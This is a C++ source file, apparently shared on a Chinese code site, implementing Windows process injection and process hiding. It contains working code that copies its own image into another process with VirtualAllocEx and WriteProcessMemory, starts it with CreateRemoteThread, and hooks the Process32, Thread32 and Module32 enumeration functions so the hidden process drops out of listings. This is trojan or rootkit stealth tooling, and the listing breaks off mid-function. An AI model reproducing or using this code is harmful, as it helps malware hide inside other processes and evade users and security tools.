📄 api.cpp
字号:
// API.cpp: implementation of the API class.
//
//////////////////////////////////////////////////////////////////////
#include "API.h"
//////////////////////////////////////////////////////////////////////
// Construction/Destruction
//////////////////////////////////////////////////////////////////////
#define LOAD_BASE_ADDR 0x03140000
CAPI::CAPI()
{
Init();
}
CAPI::~CAPI()
{
}
CAPI::Init()
{
GetOSVersion();
m_module=GetModuleHandle(NULL);
}
void CAPI::GetOSVersion(void)
{
OSVERSIONINFO osvi;
osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
if(GetVersionEx(&osvi)==FALSE) {
DMsgBox("Unable to get version info GetOSVersion()");
}
if(osvi.dwPlatformId==VER_PLATFORM_WIN32s) {
DMsgBox("This application does not run under WIN32s!");
}
if (osvi.dwPlatformId == VER_PLATFORM_WIN32_NT)
m_bIsWinNT = 1;
else
m_bIsWinNT = 0;
}
BOOL CAPI::HideProcessIn(char *szRemoteProcess,LPTHREAD_START_ROUTINE pMyMainProcess,BOOL bNtHideAll)
{
EnableDebugPriv();
if(m_bIsWinNT)
{
if(!bNtHideAll)
return HideProcessInNT(szRemoteProcess,pMyMainProcess);
else
return HideProcessInNT_2_All(pMyMainProcess);
}
else
{
return HideProcessIn9X(pMyMainProcess);
}
return TRUE;
}
BOOL CAPI::HideProcessInNT(char *szRemoteProcess,LPTHREAD_START_ROUTINE pMyMainProcess)
{
unsigned long lProcessID=GetNTProcessIDbyName(szRemoteProcess);
return HideProcessInNTbyID(lProcessID,pMyMainProcess);
}
BOOL CAPI::HideProcessInNTbyID(unsigned long lProcessID,LPTHREAD_START_ROUTINE pMyMainProcess)
{
if(lProcessID==-1)
return FALSE;
//dont inject to our process
if(GetCurrentProcessId()==lProcessID)
return FALSE;
DMsgBox("1");
HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,lProcessID);
//open process error. dont have right
if(hProc==NULL)
return FALSE;
HMODULE lnewModule=(HMODULE) LOAD_BASE_ADDR;
//alloc mem for our process
//VirtualFreeEx(hProc,lnewModule,0,MEM_RELEASE);
//compute our process image size
DWORD dwSize=((PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET(m_module))->SizeOfImage;
// char *pMem=(char *)VirtualAllocEx(hProc,m_module,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
//----------------------------------------------
DMsgBox("2");
char *pMem=NULL;
int x=0;
while((pMem=(char *)VirtualAllocEx(hProc,lnewModule,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE))==NULL)
{
lnewModule-=1024;//one page??
if(((unsigned long)lnewModule)<0x10000)
return FALSE;//没有希望了
x=GetLastError();
}
if(pMem==NULL)
{
DMsgBox("VirtualAllocEx Error,多次分配后失敗");
return FALSE;
}
DMsgBox("3");
char szMsg[200];
if((long)pMem!=LOAD_BASE_ADDR)
{
sprintf(szMsg,"old model=0X%X; new model=0X%X,pMem=0X%X; 多次分配后成功!",m_module,lnewModule,pMem);
DMsgBox(szMsg);
}
else
{
sprintf(szMsg,"old model=0X%X; new model=0X%X,pMem=0X%X; 一次分配成功!",m_module,lnewModule,pMem);
DMsgBox(szMsg);
}
//-------------------------------------------------????????????????
if((long)pMem!=(long)lnewModule)
{
lnewModule=(HMODULE)pMem;
DMsgBox("(pMem!=lnewModule)");
}
//-------------------------------------------------
// copy our process
DWORD dwOldProt,dwNumBytes,i;
MEMORY_BASIC_INFORMATION mbi;
//get my bin code
char* pMyExeData=new char[dwSize];
long lMyID=GetCurrentProcessId();
HANDLE hMyProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,lMyID);
DWORD dRead;
ReadProcessMemory(hMyProc,m_module, pMyExeData,dwSize,&dRead);
//fix relocation table
FixRelocationTable(pMyExeData,dwSize,(unsigned long)m_module,(unsigned long)pMem);
VirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));
while(mbi.Protect!=PAGE_NOACCESS && mbi.RegionSize!=0) {
if(!(mbi.Protect & PAGE_GUARD)) {
for(i=0;i<mbi.RegionSize;i+=0x1000) {
VirtualProtectEx(hProc,pMem+i,0x1000,PAGE_EXECUTE_READWRITE,&dwOldProt);
WriteProcessMemory(hProc,pMem+i,pMyExeData+i,0x1000,&dwNumBytes);
}
}
pMem+=mbi.RegionSize;
VirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION));
}
// Create a remote thread in the other process
DWORD dwRmtThdID;
//run it ine new enter point!!
long l=(char*)lnewModule-(char*)m_module;
HANDLE hRmtThd=CreateRemoteThread(hProc,NULL,0,
(LPTHREAD_START_ROUTINE)((long)pMyMainProcess+(long)l),
(LPVOID)lnewModule,0,&dwRmtThdID);
if(hRmtThd==NULL) {
DMsgBox("Could create remote thread error!");
return FALSE;
}
CloseHandle(hProc);
return TRUE;
}
/*******************************************************************
return value: -1 FALSE other ProcessID
only for winnt!
********************************************************************/
//#include "psapi.h"
//#pragma comment(lib, "Psapi.lib")
typedef BOOL (WINAPI* p_EnumProcesses )(DWORD * lpidProcess,DWORD cb, DWORD * cbNeeded );
typedef BOOL (WINAPI* p_EnumProcessModules )( HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded );
typedef DWORD (WINAPI* p_GetModuleBaseName) ( HANDLE hProcess, HMODULE hModule, LPSTR lpBaseName, DWORD nSize );
long CAPI::GetNTProcessIDbyName(char *szName)
{
if((!m_bIsWinNT)||(!szName))
return -1;
HMODULE hModule=LoadLibrary("psapi.dll");
if(hModule==NULL)
return -1;
p_EnumProcesses pEnumProcesses=(p_EnumProcesses)GetProcAddress(hModule,"EnumProcesses");
p_EnumProcessModules pEnumProcessModules=(p_EnumProcessModules)GetProcAddress(hModule,"EnumProcessModules");
p_GetModuleBaseName pGetModuleBaseName=(p_GetModuleBaseName)GetProcAddress(hModule,"GetModuleBaseNameA");
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
if ( !pEnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )
return -1;
// Calculate how many process identifiers were returned.
cProcesses = cbNeeded / sizeof(DWORD);
// Print the name and process identifier for each process.
for ( i = 0; i < cProcesses; i++ )
{
char szProcessName[MAX_PATH] = "";
// Get a handle to the process.
HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, aProcesses[i] );
// Get the process name.
if ( hProcess )
{
HMODULE hMod;
DWORD cbNeeded;
if ( pEnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
{
pGetModuleBaseName( hProcess, hMod, szProcessName, MAX_PATH );
if(_stricmp(szName,szProcessName)==0)
{//found process
CloseHandle (hProcess);
return aProcesses[i];
}
}
CloseHandle (hProcess);
}//end if
}
return -1;
}
long CAPI::GetAll(_s_process_info_* spInfo)
{
int nRet=0;
if((!m_bIsWinNT)||(!spInfo))
return nRet;
HMODULE hModule=LoadLibrary("psapi.dll");
if(hModule==NULL)
return nRet;
p_EnumProcesses pEnumProcesses=(p_EnumProcesses)GetProcAddress(hModule,"EnumProcesses");
p_EnumProcessModules pEnumProcessModules=(p_EnumProcessModules)GetProcAddress(hModule,"EnumProcessModules");
p_GetModuleBaseName pGetModuleBaseName=(p_GetModuleBaseName)GetProcAddress(hModule,"GetModuleBaseNameA");
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
if ( !pEnumProcesses( aProcesses, sizeof(aProcesses), &cbNeeded ) )
return -1;
// Calculate how many process identifiers were returned.
cProcesses = cbNeeded / sizeof(DWORD);
// Print the name and process identifier for each process.
for ( i = 0; i < cProcesses; i++ )
{
char szProcessName[MAX_PATH] = "";
// Get a handle to the process.
HANDLE hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, aProcesses[i] );
// Get the process name.
if ( hProcess )
{
HMODULE hMod;
DWORD cbNeeded;
if ( pEnumProcessModules( hProcess, &hMod, sizeof(hMod), &cbNeeded) )
{
pGetModuleBaseName( hProcess, hMod, szProcessName, MAX_PATH );
nRet++;
if(nRet>=MAX_PROCESS_FIND)
break;
strcpy(spInfo->szName[nRet-1],szProcessName);
spInfo->lProcessID[nRet-1]=aProcesses[i];
}
CloseHandle (hProcess);
}//end if
}
return nRet;
}
void CAPI::ReloadDLL()
{
LoadLibrary("kernel32.dll");
LoadLibrary("user32.dll");
LoadLibrary("gdi32.dll");
LoadLibrary("winspool.dll");
LoadLibrary("advapi32.dll");
LoadLibrary("shell32.dll");
LoadLibrary("ole32.dll");
LoadLibrary("oleaut32.dll");
LoadLibrary("wsock32.dll");
}
typedef DWORD (WINAPI *REGSERVICEPROC)(DWORD dwProcessId, DWORD dwServiceType);
#define RVATOVA(base,offset) ((LPVOID)((DWORD)(base)+(DWORD)(offset)))
#define VATORVA(base,offset) ((LPVOID)((DWORD)(offset)-(DWORD)(base)))
typedef BOOL (WINAPI *MODULEWALK)(HANDLE hSnapshot, LPMODULEENTRY32 lpme);
typedef BOOL (WINAPI *THREADWALK)(HANDLE hSnapshot, LPTHREADENTRY32 lpte);
typedef BOOL (WINAPI *PROCESSWALK)(HANDLE hSnapshot, LPPROCESSENTRY32 lppe);
// --------------------- Code to hide Win95 processes ----------------------
void __declspec(naked) StartOfHappyCode(void)
{
}
BOOL WINAPI FakeProcess32First(HANDLE hSnapshot, LPPROCESSENTRY32 lppe)
{
if(((PROCESSWALK)0x22222222)(hSnapshot, lppe)==FALSE) return FALSE;
while(lppe->th32ProcessID==0x11111111) {
if(((PROCESSWALK)0x33333333)(hSnapshot, lppe)==FALSE) return FALSE;
}
return TRUE;
}
BOOL WINAPI FakeProcess32Next(HANDLE hSnapshot, LPPROCESSENTRY32 lppe)
{
if(((PROCESSWALK)0x33333333)(hSnapshot, lppe)==FALSE) return FALSE;
while(lppe->th32ProcessID==0x11111111) {
if(((PROCESSWALK)0x33333333)(hSnapshot, lppe)==FALSE) return FALSE;
}
return TRUE;
}
BOOL WINAPI FakeThread32First(HANDLE hSnapshot, LPTHREADENTRY32 lpte)
{
if(((THREADWALK)0x44444444)(hSnapshot, lpte)==FALSE) return FALSE;
while(lpte->th32OwnerProcessID==0x11111111) {
if(((THREADWALK)0x55555555)(hSnapshot, lpte)==FALSE) return FALSE;
}
return TRUE;
}
BOOL WINAPI FakeThread32Next(HANDLE hSnapshot, LPTHREADENTRY32 lpte)
{
if(((THREADWALK)0x55555555)(hSnapshot, lpte)==FALSE) return FALSE;
while(lpte->th32OwnerProcessID==0x11111111) {
if(((THREADWALK)0x55555555)(hSnapshot, lpte)==FALSE) return FALSE;
}
return TRUE;
}
BOOL WINAPI FakeModule32First(HANDLE hSnapshot, LPMODULEENTRY32 lpme)
{
if(((MODULEWALK)0x66666666)(hSnapshot, lpme)==FALSE) return FALSE;
while(lpme->th32ProcessID==0x11111111) {
if(((MODULEWALK)0x77777777)(hSnapshot, lpme)==FALSE) return FALSE;
}
return TRUE;
}
BOOL WINAPI FakeModule32Next(HANDLE hSnapshot, LPMODULEENTRY32 lpme)
{
if(((MODULEWALK)0x77777777)(hSnapshot, lpme)==FALSE) return FALSE;
while(lpme->th32ProcessID==0x11111111) {
if(((MODULEWALK)0x77777777)(hSnapshot, lpme)==FALSE) return FALSE;
}
return TRUE;
}
void __declspec(naked) EndOfHappyCode(void)
{
}
FARPROC SetDLLProcAddress(HMODULE hModule, LPCSTR lpProcName, FARPROC fpAddr)
{
if(hModule==NULL) return FALSE;
// Get header
PIMAGE_OPTIONAL_HEADER poh;
poh = (PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET (hModule);
// Get number of image directories in list
int nDirCount;
nDirCount=poh->NumberOfRvaAndSizes;
if(nDirCount<16) return FALSE;
// - Sift through export table -----------------------------------------------
if(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size==0) return FALSE;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -